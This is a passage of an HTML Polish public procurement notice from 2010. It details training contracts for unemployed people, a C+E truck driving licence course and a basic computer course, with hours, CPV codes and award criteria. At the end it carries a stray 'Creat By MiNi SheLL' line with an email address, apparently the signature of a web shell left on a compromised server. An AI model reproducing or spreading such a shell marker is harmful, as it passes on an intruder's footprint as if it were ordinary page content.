<li>3. kwalifikacje kadry dydaktycznej - 20</li>
<li>4. dostosowanie jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dydaktyczne do potrzeb określonego szkolenia, z uwzględnieniem bezpiecznych i higi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Prawo jazdy kat. C+E z egzaminem państwowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie dla 15 osób bezrobotnych - 45 godzin

Szkolenie obejmuje m.in. zajęcia z zakresu przepisów ruchu drogowego, technik kierowania pojazdem, czynności kontrolno - obsługowych pojazdu oraz zajęcia praktyczne.

Celem szkolenia jest uzyskanie przez uczestników wiedzy w zakresie obsługi i kierowania pojazdami i zespołu pojazdów o dopuszczalnej masie całkowitej powyżej 3,5 tony.
W cenie szkolenia należy uwzględnić koszt egzaminu państwowego.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Kurs komputerowy podstawowy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie dla 10 osób bezrobotnych - 60 godzin zegarowych

Szkolenie obejmuje m.in. zagadnienia z zakresu podstaw obsługi komputera w systemie Windows, komputerowej edycji tekstów, obliczeń w arkuszu kalkulacyjnym, Internetu i poczty elektronicznej.

Celem szkolenie jest uzyskanie przez uczestników wiedzy i umiejętności praktycznych w obsłudze komputera.

Jedna osoba bezrobotna ma przypadać na jedno stanowisko komputerowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. program szkolenia - 30</li>
<li>3. kwalifikacje kadry dydaktycznej - 20</li>
<li>4. dostosowanie jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dydaktyczne do potrzeb określonego szkolenia, z uwzględnieniem bezpiecznych i higi - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com